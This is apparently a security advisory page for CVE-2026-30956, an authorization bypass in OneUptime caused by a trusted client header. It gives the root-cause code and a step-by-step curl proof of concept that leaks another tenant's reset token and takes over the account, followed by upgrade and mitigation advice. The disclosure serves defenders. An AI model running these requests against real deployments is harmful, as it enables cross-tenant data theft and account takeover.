Your RSA-2048 keys break in 2030. Find every one of them before attackers do.
📦 npm

GHSA-r5v6-2599-9g3m

CRITICAL

OneUptime has authorization bypass via client‑controlled is-multi-tenant-query header that leads to cross‑tenant data exposure and account takeover

Also known asCVE-2026-30956
Published
Mar 10, 2026
Updated
Mar 10, 2026
Affected
1 pkg
Patched
1 / 1
Exploits
None indexed

EPSS Exploitation Probability

via FIRST.org ↗
0.5%probability of exploitation in next 30 days
Lower Risk39th percentile+0.47%
0.00%0.33%0.66%0.99%0.0%0.1%0.0%0.5%Apr 26Jun 26Jun 26

EPSS (Exploit Prediction Scoring System) is a daily probability model maintained by FIRST.org. It estimates the likelihood a CVE will be exploited in production environments within the next 30 days, derived from real-world threat intelligence signals.

Blast Radius

1 pkg affected
📦@oneuptime/common

Real-time download stats are indexed for npm and PyPI packages. This vulnerability affects npm packages — download data is not available via public APIs for these ecosystems.

Description

Summary

A low‑privileged user can bypass authorization and tenant isolation in OneUptime v10.0.20 by sending a forged is-multi-tenant-query header together with a controlled projectid header.

Because the server trusts this client-supplied header, internal permission checks in BasePermission are skipped and tenant scoping is disabled.

This allows attackers to:

  1. Access project data belonging to other tenants
  2. Read sensitive User fields via nested relations
  3. Leak plaintext resetPasswordToken
  4. Reset the victim’s password and fully take over the account

This results in cross‑tenant data exposure and full account takeover.

Details

Root cause

The API trusts a client‑controlled header to determine whether a request should bypass authorization checks.

CommonAPI.ts

if (req.headers["is-multi-tenant-query"]) {
  props.isMultiTenantRequest = true;
}

BasePermission.ts

if (!props.isMultiTenantRequest) {
  TablePermission.checkTableLevelPermissions(...)
  QueryPermission.checkQueryPermission(...)
  SelectPermission.checkSelectPermission(...)
}

When the attacker sends:

is-multi-tenant-query: true

the system skips all authorization checks including:

  • Table permission validation
  • Query permission validation
  • Select permission validation
  • Tenant isolation enforcement

Additionally, tenant scoping is disabled in TenantPermission

Sensitive user data exposure

Projects marked with:

@MultiTenentQueryAllowed(true)

allow cross-tenant queries when the header is present.

The Project model contains a relation:

createdByUser

Because select permission checks are skipped, attackers can retrieve sensitive fields from the User model including:

password
resetPasswordToken
webauthnChallenge

Reset token stored in plaintext

In the password reset flow:

Authentication.ts

resetPasswordToken: token

The reset token is stored in plaintext in the database.

During password reset:

/api/identity/reset-password

the server validates the provided token directly.

If an attacker leaks this token through the authorization bypass, they can immediately reset the victim’s password.

Exploitation chain

  1. Attacker bypasses tenant isolation using is-multi-tenant-query
  2. Attacker reads victim project
  3. Attacker selects createdByUser.resetPasswordToken
  4. Attacker triggers forgot-password for victim
  5. Attacker retrieves the fresh token via the same query
  6. Attacker calls /api/identity/reset-password
  7. Attacker sets a new password
  8. Attacker logs in as victim

This results in full account takeover.

PoC

Setup:

  • Local OneUptime v10.0.20 instance
  • Two normal accounts:
    • Attacker account owns Project A (7cb77c45-c2e0-42b5-8a28-57aa0dec6e82)
    • Victim account owns Project B (88ced36b-4c0a-4c12-bdf1-497d60b10b23) with email [email protected]

Chain 1: Direct Project Isolation Bypass

1. Read isolation bypass

curl -X POST http://localhost/api/project/get-list \
  -H "authorization: Bearer <attacker_token>" \
  -H "projectid: 7cb77c45-c2e0-42b5-8a28-57aa0dec6e82" \
  -H "is-multi-tenant-query: true" \
  -H "content-type: application/json" \
  -d '{
        "query": {},
        "select": {
            "_id": true,
            "name": true,
            "createdOwnerEmail": true
        }
      }'

Result: Returns both the attacker's and victim's projects:

{
  "data": [
    {
      "_id": "88ced36b-4c0a-4c12-bdf1-497d60b10b23",
      "name": "Victim Project",
      "createdOwnerEmail": { "value": "[email protected]" }
    },
    {
      "_id": "7cb77c45-c2e0-42b5-8a28-57aa0dec6e82",
      "name": "Attacker Project",
      "createdOwnerEmail": { "value": "[email protected]" }
    }
  ],
  "count": 2
}
  1. Write isolation bypass

Victim project name is initially: Victim Project ORIGINAL

curl -X POST http://localhost/api/project/88ced36b-4c0a-4c12-bdf1-497d60b10b23/update-item \
  -H "authorization: Bearer <attacker_token>" \
  -H "projectid: 7cb77c45-c2e0-42b5-8a28-57aa0dec6e82" \
  -H "is-multi-tenant-query: true" \
  -H "content-type: application/json" \
  -d '{"name":"Victim Project EXPLOIT"}'

Result: Victim project name is updated to "Victim Project EXPLOIT" despite the attacker not being a member of the victim project.

Chain 2: Account Takeover via Credential Leakage

  1. Trigger password reset for victim
curl -X POST http://localhost/api/identity/forgot-password \
  -H "content-type: application/json" \
  -d "{\"email\":\"[email protected]\"}"
  1. Leak victim password hash and reset token via tenant bypass
curl -X POST http://localhost/api/project/get-list \
  -H "authorization: Bearer <attacker_token>" \
  -H "projectid: 7cb77c45-c2e0-42b5-8a28-57aa0dec6e82" \
  -H "is-multi-tenant-query: true" \
  -H "content-type: application/json" \
  -d '{
        "query": {"_id": "88ced36b-4c0a-4c12-bdf1-497d60b10b23"},
        "select": {
          "_id": true,
          "createdByUser": {
            "email": true,
            "password": true,
            "resetPasswordToken": true
          }
        }
      }'

Result: Sensitive user data is exposed:

{
  "data": [{
    "_id": "88ced36b-4c0a-4c12-bdf1-497d60b10b23",
    "createdByUser": {
      "email": {"value": "[email protected]"},
      "password": {"value": "faef08e8f2b9e9dfa09c15dfaf043b8aad7761d9712c7e09417d4da2156e33d9"},
      "resetPasswordToken": "4b75e6d0-1aca-11f1-b2d4-698549b693fb"
    }
  }]
}
  1. Take over victim account using leaked token
# Reset password with leaked token
curl -X POST http://localhost/api/identity/reset-password \
  -H "content-type: application/json" \
  -d '{
    "resetPasswordToken": "4b75e6d0-1aca-11f1-b2d4-698549b693fb",
    "password": "AttackerChosenPassword123!"
  }'

# Login as victim with new password
curl -X POST http://localhost/api/identity/login \
  -H "content-type: application/json" \
  -d '{
    "email": "[email protected]",
    "password": "AttackerChosenPassword123!"
  }'

Result: Successful login with attacker-chosen password, original password fails - complete account takeover achieved.

Result: Victim project name is updated despite the attacker not being a member of the victim project.

Impact

This vulnerability allows a low‑privileged authenticated user to:

  • bypass tenant isolation
  • access other tenant projects
  • read sensitive user credential fields
  • leak plaintext reset tokens
  • reset victim passwords
  • fully take over victim accounts

Because OneUptime is a multi‑tenant monitoring platform, this allows attackers to compromise any tenant account in the system.

Affected Packages

1 total 1 fixed
EcosystemPackageVulnerable rangeFix
📦npm@oneuptime/commonall versions10.0.21

Detection & mitigation playbook

Open-source dependency

  1. Detect

    Scan your dependency tree (package-lock.json, pnpm-lock.yaml, requirements.txt, go.sum, etc.) for @oneuptime/common. O3's reachability analysis confirms whether the vulnerable code path is actually invoked in your application, so you act on real exposure instead of every transitive match.

  2. Fix

    Update @oneuptime/common to 10.0.21 or later, then make sure no transitive (indirect) dependency still pins the vulnerable range — O3 confirms GHSA-r5v6-2599-9g3m is resolved across your whole dependency graph.

  3. Workarounds

    If you can't upgrade right away: gate or disable the affected feature, validate untrusted input at the boundary, and avoid passing attacker-controlled data into the vulnerable path. O3's runtime protection blocks exploitation in production as an interim safeguard until the upgrade lands.

  4. How O3 protects you

    O3 pinpoints whether GHSA-r5v6-2599-9g3m is reachable in your code and exactly where to fix it, then blocks exploitation in production at runtime until the patched version is deployed.

Tailored to GHSA-r5v6-2599-9g3m. Runtime protection reduces exposure until a permanent patch is applied and verified — it complements patching, it doesn't replace it.

Frequently Asked Questions

### Summary A low‑privileged user can bypass authorization and tenant isolation in OneUptime `v10.0.20` by sending a forged `is-multi-tenant-query` header together with a controlled `projectid` header. Because the server trusts this client-supplied header, internal permission checks in `BasePermission` are skipped and tenant scoping is disabled. This allows attackers to: 1. Access project data belonging to other tenants 2. Read sensitive User fields via nested relations 3. Leak plaintext resetPasswordToken 4. Reset the victim’s password and fully take over the account This results in cross
O3 Security · Impact-Aware SCA

Is GHSA-r5v6-2599-9g3m in your dependencies?

O3 detects GHSA-r5v6-2599-9g3m across npm dependencies and uses function-level reachability to confirm whether the vulnerable code path is actually reachable — not just present. No false positives.

Scan my dependencies How O3 SCA works